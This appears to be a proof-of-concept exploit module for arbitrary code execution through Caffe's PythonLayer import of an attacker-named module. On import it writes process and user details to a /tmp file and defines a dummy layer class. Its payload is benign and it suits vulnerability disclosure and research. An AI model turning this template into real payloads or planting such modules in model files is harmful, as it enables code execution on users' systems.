File size: 1,541 Bytes
6edd0ae | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 | """
PoC: Caffe PythonLayer Arbitrary Code Execution
================================================
This module is imported by Caffe when a .prototxt specifies a Python layer
with module="evil_layer". The top-level code executes immediately upon import.
Vulnerability: layer_factory.cpp:295
bp::import(param.python_param().module().c_str())
This calls Python's import mechanism with an attacker-controlled module name
from the .prototxt file. No sanitization, no allowlist, no sandboxing.
"""
import os
import sys
# PoC: write proof of execution to /tmp
proof_file = "/tmp/caffe_rce_proof.txt"
with open(proof_file, "w") as f:
f.write(f"Caffe PythonLayer RCE triggered!\n")
f.write(f"PID: {os.getpid()}\n")
f.write(f"UID: {os.getuid()}\n")
f.write(f"CWD: {os.getcwd()}\n")
f.write(f"Python: {sys.executable}\n")
f.write(f"User: {os.environ.get('USER', 'unknown')}\n")
print(f"[PoC] Code executed! Proof written to {proof_file}")
# For the PoC we also need to provide a valid PythonLayer class,
# otherwise Caffe crashes after import (but code already executed).
# In a real attack, the attacker gets RCE from the import alone.
import caffe
class ExploitLayer(caffe.Layer):
"""Dummy layer to satisfy Caffe's PythonLayer requirements after import."""
def setup(self, bottom, top):
top[0].reshape(1)
def reshape(self, bottom, top):
top[0].reshape(1)
def forward(self, bottom, top):
top[0].data[...] = 0
def backward(self, top, propagate_down, bottom):
pass
|